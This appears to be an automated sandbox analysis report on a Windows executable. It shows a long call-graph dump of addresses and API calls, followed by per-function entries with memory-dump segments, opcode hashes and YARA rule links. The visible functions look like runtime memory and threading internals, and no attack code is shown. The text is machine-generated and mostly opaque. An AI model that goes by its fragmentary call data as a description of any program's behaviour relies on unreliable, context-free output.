19338->19331 19401 7ff6385d3df0 19338->19401 19408 7ff6385d3dd0 CloseHandle 19340->19408 19344 7ff6385f1df6 19341->19344 19341->19348 19409 7ff6385d3dd0 CloseHandle 19344->19409 19345 7ff6385f1ca6 19345->19331 19347 7ff6385d3e70 4 API calls 19345->19347 19347->19331 19348->19316 19348->19317 19349 7ff6385f1d6a 19348->19349 19349->19235 19350->19212 19351->19235 19353 7ff6386020bf 19352->19353 19354 7ff6386020f5 19353->19354 19355 7ff6386020ff 19353->19355 19360 7ff638602127 19353->19360 19369 7ff6385d4ad0 19354->19369 19357 7ff6385d4a50 3 API calls 19355->19357 19359 7ff63860210d 19357->19359 19359->19360 19380 7ff6385d4a30 VirtualFree 19359->19380 19360->19275 19362->19295 19363->19280 19364->19272 19365->19286 19366->19288 19367->19298 19368->19299 19370 7ff6385d4afe LookupPrivilegeValueW 19369->19370 19371 7ff6385d4b96 GetLargePageMinimum 19369->19371 19372 7ff6385d4bcf 19370->19372 19373 7ff6385d4b1a GetCurrentProcess OpenProcessToken 19370->19373 19374 7ff6385d4bd3 GetCurrentProcess VirtualAllocExNuma 19371->19374 19375 7ff6385d4bb6 VirtualAlloc 19371->19375 19378 7ff63862abf0 8 API calls 19372->19378 19373->19372 19376 7ff6385d4b51 AdjustTokenPrivileges GetLastError CloseHandle 19373->19376 19374->19372 19375->19372 19376->19372 19377 7ff6385d4b8b 19376->19377 19377->19371 19377->19372 19379 7ff6385d4c06 19378->19379 19379->19359 19380->19360 19382 7ff6385d3f38 19381->19382 19383 7ff6385d3f51 GetLogicalProcessorInformation 19382->19383 19387 7ff6385d3f7d 19382->19387 19384 7ff6385d3f72 GetLastError 19383->19384 19385 7ff6385d3f84 19383->19385 19384->19385 19384->19387 19386 7ff6385d3fc1 GetLogicalProcessorInformation 19385->19386 19385->19387 19386->19387 19387->19304 19389 7ff638604b09 19388->19389 19393 7ff6385f248c 19388->19393 19390 7ff638604b24 LoadLibraryExW 19389->19390 19389->19393 19391 7ff638604b52 GetProcAddress 19390->19391 19390->19393 19392 7ff638604b67 19391->19392 19392->19393 19393->19315 19395 7ff6385d413f GlobalMemoryStatusEx 19394->19395 19396 7ff6385d4087 GetCurrentProcess 19394->19396 19400 7ff6385d40a8 19395->19400 19397 7ff6385d40a0 19396->19397 19397->19395 19397->19400 19398 7ff63862abf0 8 API calls 19399 7ff6385d4218 19398->19399 19399->19328 19400->19398 19402 7ff63862ab44 _swprintf_c_l 3 API calls 19401->19402 19403 7ff6385d3e16 19402->19403 19404 7ff6385d3e1e CreateEventW 19403->19404 19405 7ff6385d3e3e 19403->19405 19404->19405 19405->19345 19406->19332 19407->19337 19408->19341 19409->19348 19410->19317 19411->19320 19412->19247 19416 7ff6385f4016 19413->19416 19414 7ff6385f40ca 19417 7ff6385d4980 3 API calls 19414->19417 19422 7ff6385f4113 19414->19422 19415 7ff6385f4067 EnterCriticalSection 19418 7ff6385f4083 19415->19418 19416->19414 19416->19415 19419 7ff6385f40df 19417->19419 19420 7ff6385f40a5 LeaveCriticalSection 19418->19420 19421 7ff6385f4107 LeaveCriticalSection 19418->19421 19419->19422 19423 7ff6385f40ec EnterCriticalSection 19419->19423 19420->19414 19421->19422 19422->19249 19423->19421 19424->19245 19425->19171 19427 7ff6385ccb65 SetThreadPriority ResumeThread FindCloseChangeNotification 19426->19427 19428 7ff6385ccb5f 19426->19428 19427->19173 19428->19173 19430 7ff6385d6273 _swprintf_c_l 19429->19430 19434 7ff6385d6299 _swprintf_c_l 19430->19434 19435 7ff6385d7210 19430->19435 19432 7ff6385d6290 19433 7ff6385ced90 InitializeCriticalSectionEx 19432->19433 19432->19434 19433->19434 19434->19179 19434->19434 19436 7ff6385d4a50 3 API calls 19435->19436 19437 7ff6385d7232 19436->19437 19438 7ff6385d723a 19437->19438 19439 7ff6385d4980 3 API calls 19437->19439 19438->19432 19440 7ff6385d7258 19439->19440 19443 7ff6385d7263 _swprintf_c_l 19440->19443 19444 7ff6385d4a30 VirtualFree 19440->19444 19442 7ff6385d737e 19442->19432 19443->19432 19444->19442 19446 7ff6385cca1e GetProcAddress 19445->19446 19447 7ff6385cca33 19445->19447 19446->19447 19447->19137 19448->18936 19449 7ff6386c4fc0 19452 7ff6386c5070 19449->19452 19451 7ff6386c4fce 19454 7ff6386c508f 19452->19454 19453 7ff6386c50de 19453->19451 19454->19453 19455 7ff6386c50bb CoInitializeEx 19454->19455 19456 7ff6386c50d2 19455->19456 19456->19453 19457 7ff6386c512a 19456->19457 19461 7ff6385c4c80 19456->19461 19458 7ff6385c4c80 28 API calls 19457->19458 19460 7ff6386c5149 19458->19460 19462 7ff6385c4d3b 19461->19462 19467 7ff6386ecbf0 19462->19467 19468 7ff6386ecc02 19467->19468 19471 7ff6386ecca0 19468->19471 19470 7ff6386ecc41 19484 7ff6385ca7c0 19471->19484 19473 7ff6386ecdda 19516 7ff6385c4b30 19473->19516 19474 7ff6386ecdac 19474->19473 19512 7ff6386ec830 19474->19512 19476 7ff6386ecd1a 19476->19474 19504 7ff6385ca910 19476->19504 19479 7ff6385ca7c0 12 API calls 19482 7ff6386ece05 19479->19482 19481 7ff6386ece4b 19481->19470 19482->19481 19483 7ff6385ca910 18 API calls 19482->19483 19483->19482 19485 7ff6385ca803 _swprintf_c_l 19484->19485 19486 7ff6385ca81d 19485->19486 19487 7ff6385ca869 19485->19487 19490 7ff6385cf550 6 API calls 19486->19490 19493 7ff6385ca837 _swprintf_c_l 19486->19493 19488 7ff6385ca883 19487->19488 19489 7ff6385cf550 6 API calls 19487->19489 19491 7ff6385ca8b4 19488->19491 19492 7ff6385ca89f 19488->19492 19489->19488 19490->19493 19495 7ff6385ca3a0 2 API calls 19491->19495 19494 7ff6385ca3a0 2 API calls 19492->19494 19520 7ff6385c9c50 19493->19520 19498 7ff6385ca8ab 19494->19498 19495->19498 19500 7ff6385ca867 19498->19500 19501 7ff6385cf550 6 API calls 19498->19501 19502 7ff6385ca8eb 19500->19502 19533 7ff6385c9600 19500->19533 19501->19500 19502->19476 19505 7ff6385ca952 _swprintf_c_l 19504->19505 19546 7ff6385c9ff0 19505->19546 19507 7ff6385ca973 19508 7ff6385ca994 19507->19508 19509 7ff6385cf550 6 API calls 19507->19509 19510 7ff6385c9600 2 API calls 19508->19510 19511 7ff6385ca9a5 19508->19511 19509->19508 19510->19511 19511->19476 19513 7ff6386ec864 19512->19513 19575 7ff6385c4890 19513->19575 19515 7ff6386ec8a1 19515->19473 19517 7ff6385c4b58 _swprintf_c_l 19516->19517 19518 7ff6385c4b71 RaiseFailFastException 19517->19518 19519 7ff6385c4b7e 19517->19519 19518->19519 19519->19479 19523 7ff6385c9c6d _swprintf_c_l 19520->19523 19521 7ff6385c9e40 19528 7ff6385ca3a0 19521->19528 19522 7ff6385c9e1f 19522->19521 19527 7ff6385cf550 6 API calls 19522->19527 19523->19521 19523->19522 19524 7ff6385c9e17 19523->19524 19525 7ff6385c9e08 RaiseFailFastException 19523->19525 19539 7ff6385ca600 19524->19539 19525->19522 19527->19521 19529 7ff6385ca407 19528->19529 19530 7ff6385ca3b2 19528->19530 19529->19500 19530->19529 19531 7ff6385c9600 2 API calls 19530->19531 19532 7ff6385ca3e2 19531->19532 19532->19500 19534 7ff6385c9616 19533->19534 19537 7ff6385c9691 19533->19537 19535 7ff6385c965c RaiseFailFastException 19534->19535 19536 7ff6385c9669 19534->19536 19534->19537 19535->19536 19536->19537 19538 7ff6385c9684 RaiseFailFastException 19536->19538 19537->19502 19538->19537 19542 7ff6385ca616 19539->19542 19540 7ff6385ca7a7 19540->19522 19541 7ff6385ca779 RaiseFailFastException 19541->19542 19542->19540 19542->19541 19543 7ff6385ca6e7 RaiseFailFastException 19542->19543 19544 7ff6385ca6fd RaiseFailFastException 19542->19544 19545 7ff6385ca78b 19542->19545 19543->19542 19544->19542 19545->19522 19560 7ff6385ca010 19546->19560 19547 7ff6385ca054 RaiseFailFastException 19547->19560 19548 7ff6385ca2db 19549 7ff6385c9c50 10 API calls 19548->19549 19554 7ff6385ca2b4 19548->19554 19549->19554 19550 7ff6385ca376 19550->19507 19551 7ff6385ca2c2 RaiseFailFastException 19551->19554 19552 7ff6385ca2d1 19553 7ff6385ca600 3 API calls 19552->19553 19553->19554 19554->19550 19555 7ff6385c9600 2 API calls 19554->19555 19557 7ff6385ca348 19555->19557 19556 7ff6385ca190 RaiseFailFastException 19556->19560 19557->19507 19559 7ff6385c9600 2 API calls 19559->19560 19560->19547 19560->19548 19560->19551 19560->19552 19560->19554 19560->19556 19560->19559 19561 7ff6385ca26e RaiseFailFastException 19560->19561 19562 7ff6385ca284 RaiseFailFastException 19560->19562 19563 7ff6385cf550 6 API calls 19560->19563 19564 7ff6385c9860 19560->19564 19561->19560 19562->19560 19563->19560 19565 7ff6385c988d 19564->19565 19566 7ff6385c98b7 19564->19566 19568 7ff6385cf550 6 API calls 19565->19568 19567 7ff6385c9a26 19566->19567 19572 7ff6385c98e4 19566->19572 19569 7ff6385c9a2c RaiseFailFastException 19567->19569 19570 7ff6385c9a39 19567->19570 19568->19566 19569->19570 19571 7ff6385c9600 2 API calls 19570->19571 19574 7ff6385c9a11 19571->19574 19573 7ff6385c9600 2 API calls 19572->19573 19573->19574 19574->19560 19576 7ff6385c48aa _swprintf_c_l 19575->19576 19579 7ff6385ccbe0 RtlCaptureContext 19576->19579 19580 7ff63862abf0 8 API calls 19579->19580 19581 7ff6385c48b9 19580->19581 19581->19515 18756 7ff6385dce7f 18757 7ff6385dced7 18756->18757 18758 7ff6385dce84 18756->18758 18766 7ff6385f0640 18757->18766 18774 7ff638600af0 18758->18774 18760 7ff6385dcf81 18762 7ff6385dcfac 18760->18762 18782 7ff6385f4180 18760->18782 18788 7ff6385e43d0 18762->18788 18765 7ff6385dd014 18767 7ff6385f0656 18766->18767 18768 7ff6385f06f0 18767->18768 18772 7ff6385f0687 18767->18772 18804 7ff6385cf550 18767->18804 18793 7ff638602160 18768->18793 18772->18758 18773 7ff6385cf550 6 API calls 18773->18772 18775 7ff638600b09 18774->18775 18779 7ff638600b19 18774->18779 18775->18760 18776 7ff638600c5b SwitchToThread 18776->18779 18777 7ff638600b69 SwitchToThread 18777->18779 18778 7ff638600c67 18778->18760 18779->18776 18779->18777 18779->18778 18780 7ff638600c10 SwitchToThread 18779->18780 18781 7ff638600c26 SwitchToThread 18779->18781 18780->18779 18781->18779 18783 7ff6385f419f 18782->18783 18787 7ff6385f4213 _swprintf_c_l 18782->18787 18784 7ff6385f4202 18783->18784 18783->18787 18858 7ff6385d4c20 VirtualAlloc 18784->18858 18787->18762 18789 7ff6385f4180 2 API calls 18788->18789 18790 7ff6385e4405 _swprintf_c_l 18789->18790 18791 7ff638600af0 4 API calls 18790->18791 18792 7ff6385e4555 18791->18792 18792->18765 18792->18792 18794 7ff638602225 18793->18794 18795 7ff638602199 EnterCriticalSection 18793->18795 18796 7ff6385f0719 18794->18796 18810 7ff6385d4980 18794->18810 18800 7ff6386021b9 LeaveCriticalSection 18795->18800 18796->18772 18796->18773 18799 7ff638602253 18799->18796 18801 7ff638602264 EnterCriticalSection 18799->18801 18800->18794 18802 7ff638602283 18801->18802 18803 7ff63860228a LeaveCriticalSection 18801->18803 18802->18803 18803->18796 18807 7ff6385cf597 _swprintf_c_l 18804->18807 18805 7ff6385cf61b 18805->18768 18807->18805 18809 7ff6385cf5eb 18807->18809 18813 7ff6385cf210 18807->18813 18809->18805 18822 7ff6385cf630 18809->18822 18811 7ff6385d49be GetCurrentProcess VirtualAllocExNuma 18810->18811 18812 7ff6385d499b VirtualAlloc 18810->18812 18811->18799 18812->18799 18814 7ff6385cf23a QueryPerformanceCounter 18813->18814 18816 7ff6385cf261 _swprintf_c_l 18813->18816 18814->18816 18821 7ff6385cf2fa 18816->18821 18828 7ff63862ab44 18816->18828 18818 7ff6385cf387 18818->18809 18820 7ff63862ab44 _swprintf_c_l 3 API calls 18820->18821 18821->18818 18831 7ff6385cc7b0 GetCurrentThreadId 18821->18831 18823 7ff6385cf685 18822->18823 18824 7ff6385cf68f QueryPerformanceCounter 18822->18824 18854 7ff6385cefe0 18823->18854 18826 7ff6385cf6e1 18824->18826 18826->18805 18832 7ff63862ac10 18828->18832 18831->18818 18833 7ff63862ac2a malloc 18832->18833 18834 7ff63862ac1b 18833->18834 18835 7ff6385cf2d1 18833->18835 18834->18833 18836 7ff63862ac3a 18834->18836 18835->18818 18835->18820 18837 7ff63862ac45 18836->18837 18841 7ff63862b7d4 18836->18841 18845 7ff63862b7f4 18837->18845 18842 7ff63862b7e2 std::bad_alloc::bad_alloc 18841->18842 18849 7ff63862c50c 18842->18849 18844 7ff63862b7f3 18846 7ff63862b802 std::bad_alloc::bad_alloc 18845->18846 18847 7ff63862c50c Concurrency::cancel_current_task 2 API calls 18846->18847 18848 7ff63862ac4b 18847->18848 18850 7ff63862c52b 18849->18850 18851 7ff63862c576 RaiseException 18850->18851 18852 7ff63862c554 RtlPcToFileHeader 18850->18852 18851->18844 18853 7ff63862c56c 18852->18853 18853->18851 18856 7ff6385cf00a _swprintf_c_l 18854->18856 18855 7ff6385cf031 18855->18824 18856->18855 18857 7ff63862ab44 _swprintf_c_l 3 API calls 18856->18857 18857->18855 18859 7ff6385d4c5b 18858->18859 18860 7ff6385d4c6c 18858->18860 18859->18860 18861 7ff6385d4c60 VirtualUnlock 18859->18861 18860->18787 18861->18860 19582 7ff6386ebba0 19583 7ff6386ebbb1 19582->19583 19584 7ff6386ebbba 19582->19584 19585 7ff6386ebbd5 19584->19585 19587 7ff6386ebb30 19584->19587 19588 7ff6386ebb49 19587->19588 19591 7ff6386ebc40 19588->19591 19590 7ff6386ebb59 19590->19585 19592 7ff6386ebc57 19591->19592 19594 7ff6386ebcba 19591->19594 19596 7ff6386ebce0 19592->19596 19594->19590 19595 7ff6386ebc6b 19595->19590 19597 7ff6386ebd13 19596->19597 19598 7ff6386ebd7b 19597->19598 19599 7ff6386ebee4 19597->19599 19600 7ff6385c4c80 28 API calls 19597->19600 19598->19595 19599->19598 19601 7ff6385c4c80 28 API calls 19599->19601 19600->19599 19602 7ff6386ebf9e 19601->19602 18862 7ff6385d1e00 18863 7ff6385d1e1a 18862->18863 18864 7ff6385d1e25 18862->18864 18865 7ff6385d1e52 VirtualAlloc 18864->18865 18867 7ff6385d1ea4 18864->18867 18866 7ff6385d1e8b 18865->18866 18865->18867 18868 7ff63862ab44 _swprintf_c_l 3 API calls 18866->18868 18869 7ff6385d1e9c 18868->18869 18869->18867 18870 7ff6385d1ef1 VirtualFree 18869->18870 18870->18867 19603 7ff6385cbe30 19607 7ff6385d94ce 19603->19607 19615 7ff6385d9651 19603->19615 19604 7ff6385cbdf5 19608 7ff6385d9535 19607->19608 19609 7ff6385d950b 19607->19609 19619 7ff6385dea40 19608->19619 19611 7ff6385d9514 DebugBreak 19609->19611 19612 7ff6385d9519 19609->19612 19611->19612 19612->19604 19613 7ff6385d9558 19613->19612 19634 7ff6385dbc10 19613->19634 19616 7ff6385d9630 19615->19616 19617 7ff6385d9519 19616->19617 19618 7ff6385dbc10 3 API calls 19616->19618 19617->19604 19618->19617 19625 7ff6385dea6f 19619->19625 19621 7ff6385f6d90 GetTickCount 19623 7ff6385dec7a 19621->19623 19623->19621 19623->19625 19631 7ff6385e6680 13 API calls 19623->19631 19671 7ff638602350 19623->19671 19685 7ff6385ded20 19623->19685 19624 7ff6385deb29 SwitchToThread 19624->19625 19625->19623 19625->19624 19627 7ff6385dec4b 19625->19627 19630 7ff638602510 WaitForSingleObject 19625->19630 19632 7ff6385deb55 SwitchToThread 19625->19632 19633 7ff6385deb1d SwitchToThread 19625->19633 19641 7ff6385e6680 19625->19641 19649 7ff6385df2a0 19625->19649 19668 7ff6385d4930 19625->19668 19627->19613 19630->19625 19631->19623 19632->19625 19633->19625 19637 7ff6385dbc46 19634->19637 19639 7ff6385dbc7f 19634->19639 19635 7ff6385dbd55 19635->19612 19636 7ff6385dbc59 SwitchToThread 19636->19637 19637->19636 19638 7ff6385d4930 SleepEx 19637->19638 19637->19639 19638->19637 19639->19635 19640 7ff6385dbd50 DebugBreak 19639->19640 19640->19635 19642 7ff6385e685f 19641->19642 19643 7ff6385e66b0 19641->19643 19642->19625 19643->19642 19646 7ff6385e67b9 19643->19646 19695 7ff6385eea40 19643->19695 19646->19642 19701 7ff6385d4900 ResetEvent 19646->19701 19650 7ff6385df2dc 19649->19650 19653 7ff6385df492 19649->19653 19651 7ff6385df34d 19650->19651 19652 7ff6385df497 19650->19652 19654 7ff6385df35c SwitchToThread 19651->19654 19652->19653 19707 7ff6385d90a0 19652->19707 19659 7ff6385df36a 19654->19659 19656 7ff6385df411 SwitchToThread 19656->19659 19659->19653 19659->19656 19660 7ff6385df43d SwitchToThread 19659->19660 19661 7ff6385d4930 SleepEx 19659->19661 19666 7ff6385df405 SwitchToThread 19659->19666 19703 7ff638602510 19659->19703 19660->19659 19661->19659 19666->19659 19669 7ff6385d4934 SleepEx 19668->19669 19670 7ff6385d493d 19668->19670 19669->19670 19670->19625 19672 7ff63860236d 19671->19672 19673 7ff6386024f9 19671->19673 19674 7ff6385d4050 10 API calls 19672->19674 19673->19623 19675 7ff638602394 19674->19675 19676 7ff6386024e7 19675->19676 19677 7ff6385d90a0 WaitForSingleObject 19675->19677 19676->19623 19680 7ff6386023cd 19677->19680 19678 7ff6386024d0 19678->19623 19679 7ff638602459 SwitchToThread 19679->19680 19680->19678 19680->19679 19681 7ff638602485 SwitchToThread 19680->19681 19682 7ff6385d4930 SleepEx 19680->19682 19683 7ff638602510 WaitForSingleObject 19680->19683 19684 7ff63860244d SwitchToThread 19680->19684 19681->19680 19682->19680 19683->19680 19684->19680 19686 7ff6385ded5c 19685->19686 19688 7ff6385deecb 19685->19688 19687 7ff6385d4930 SleepEx 19686->19687 19686->19688 19690 7ff6385ded9f 19687->19690 19689 7ff6385dee4a SwitchToThread 19689->19690 19690->19688 19690->19689 19691 7ff6385dee76 SwitchToThread 19690->19691 19692 7ff6385d4930 SleepEx 19690->19692 19693 7ff638602510 WaitForSingleObject 19690->19693 19694 7ff6385dee3e SwitchToThread 19690->19694 19691->19690 19692->19690 19693->19690 19694->19690 19696 7ff6385eeaeb 19695->19696 19699 7ff6385eec48 19696->19699 19702 7ff6385d48c0 QueryPerformanceCounter 19696->19702 19698 7ff6385d4050 10 API calls 19700 7ff6385eee31 19698->19700 19699->19698 19699->19700 19700->19646 19702->19699 19704 7ff638602526 19703->19704 19706 7ff63860255d 19704->19706 19711 7ff6385d4c90 WaitForSingleObject 19704->19711 19706->19659 19708 7ff6385d90b8 19707->19708 19712 7ff6385d4c90 WaitForSingleObject 19708->19712 18871 7ff6385df61b 18874 7ff638600ca0 18871->18874 18873 7ff6385df5f3 18873->18873 18877 7ff6385dc9a0 18874->18877 18876 7ff638600cd8 18876->18873 18878 7ff6385dc9e9 18877->18878 18879 7ff638600af0 4 API calls 18878->18879 18883 7ff6385dcac0 18878->18883 18884 7ff6385dcaf6 _swprintf_c_l 18879->18884 18880 7ff6385f4180 2 API calls 18881 7ff6385dccda 18880->18881 18882 7ff6385e43d0 6 API calls 18881->18882 18881->18883 18882->18883 18883->18876 18884->18880 18884->18881 19713 7ff6385c4308 19715 7ff6385c430e 19713->19715 19714 7ff6385c436c 19715->19714 19716 7ff6385c4c80 28 API calls 19715->19716 19717 7ff6386ecb01 19716->19717 19718 7ff6386ecca0 28 API calls 19717->19718 19719 7ff6386ecbe1 19718->19719

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF6385D46F0 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D46FF
                                                                                                                                                                                                                                  • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D473D
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4769
                                                                                                                                                                                                                                  • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D477A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4789
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6385CC8CA), ref: 00007FF6385D4820
                                                                                                                                                                                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF6385D4833
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 580471860-0
                                                                                                                                                                                                                                  • Opcode ID: 2499757e382cc0260e021b004913e5396d42f961aaff0a7f38b800a9eef933a6
                                                                                                                                                                                                                                  • Instruction ID: 9ad88dfb49ee934b81c95e3b3724cf36ca61a75b957ff33062efcf43db70982f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2499757e382cc0260e021b004913e5396d42f961aaff0a7f38b800a9eef933a6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50513A33A5868686EA80CF39E4001E9A3A2FF55795F844032D94DCB765DF3EE64DE708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385C6E20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF6385C6E73
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6385D0580: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6385D067D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionHandlerVectored_wcsicmp
                                                                                                                                                                                                                                  • String ID: StressLogLevel$TotalStressLogSize
                                                                                                                                                                                                                                  • API String ID: 2513536313-4058818204
                                                                                                                                                                                                                                  • Opcode ID: db9029060a23648276927aef3b946d57bbea15317c2cacec7f1b821d138b9c72
                                                                                                                                                                                                                                  • Instruction ID: 3b8fd2bed15fa2d3b264c4a0e9354d3516de8edaf9965dec27b6ad35a7d365b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db9029060a23648276927aef3b946d57bbea15317c2cacec7f1b821d138b9c72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68319333E0864285EB909F34E0012E967B1EF817A8F484035DE499779BDF7EE549DB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385F0AE0 Relevance: 2.1, APIs: 1, Instructions: 553COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BreakCounterCreateDebugEventPerformanceQuery
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4239280443-0
                                                                                                                                                                                                                                  • Opcode ID: 13d23e181a2cb41bea5292db9cb94548f886d0b06a318fd914d236553dce4aea
                                                                                                                                                                                                                                  • Instruction ID: ca179884f2386f2549b63ac3d2eda9d35b58d3d31316388f6ea29b6a51e9c1cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13d23e181a2cb41bea5292db9cb94548f886d0b06a318fd914d236553dce4aea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C622737A08B8681E7508B34E8402E973E4FF58795F505639D98D93761DF3EB1A4E308
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385DB020 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
